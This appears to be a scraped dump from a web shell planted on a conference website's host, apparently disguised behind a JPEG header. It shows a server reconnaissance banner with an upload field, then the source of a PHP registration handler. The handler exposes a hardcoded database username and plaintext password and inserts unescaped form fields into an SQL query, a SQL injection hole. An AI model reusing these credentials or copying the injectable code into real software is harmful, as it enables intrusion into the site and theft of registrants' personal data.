����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.191.158.217 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/greatlifeconference.com/version/ |
Upload File : |
<?php if ($_SERVER['REQUEST_METHOD'] == 'POST') { $conn = mysqli_connect('localhost', 'greatli2_GlconferENS', 'Olajidey@99','greatli2_GlconferENS') or die("Connection failed: " . mysqli_connect_error()); if (isSet($_POST['send'])) { if (isSet($_POST['user']) && isSet($_POST['email']) && isSet($_POST['phoneno'])) { $user = $_POST['user']; $phoneno = $_POST['phoneno']; $email = $_POST['email']; $sql = "INSERT INTO `users` (`username`,`phoneno`,`email`) VALUES ('$user', '$phoneno', '$email')"; $query = mysqli_query($conn,$sql); if ($query) { echo '<html lang="en"> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <title></title> <link href="https://fonts.googleapis.com/css?family=Lato:300,400|Montserrat:700" rel="stylesheet" type="text/css"> <style> @import url(//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.1/normalize.min.css); @import url(//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css); </style> <link rel="stylesheet" href="https://2-22-4-dot-lead-pages.appspot.com/static/lp918/min/default_thank_you.css"> <script src="https://2-22-4-dot-lead-pages.appspot.com/static/lp918/min/jquery-1.9.1.min.js"></script> <script src="https://2-22-4-dot-lead-pages.appspot.com/static/lp918/min/html5shiv.js"></script> </head> <body> <header class="site-header" id="header"> <h1 class="site-header__title" data-lead-id="site-header-title">THANK YOU!</h1> </header> <div class="main-content"> <i class="fa fa-check main-content__checkmark" id="checkmark"></i> <p class="main-content__body" data-lead-id="main-content-body">Thanks a bunch for filling that out. It means a lot to us, just like you do! We really appreciate you giving us a moment of your time today. Thanks for being you.</p> </div> <footer class="site-footer" id="footer"> <p class="site-footer__fineprint" id="fineprint">Copyright © 2023 Gltech | All Rights Reserved</p> </footer> </body> </html></a> <span id="timer">This page will redirect in <span id="count"></span> second(s).</span> '; } else { echo "An error occured while save the data."; } } } } ?> <script type="text/javascript"> var count = 6; var redirect = "http://greatlifeconference.com/"; var elem = document.getElementById('count'); elem.innerText = count setInterval(() => { count-- elem.innerText = count if (count == 0) { window.location.href = redirect; } }, 1000) </script>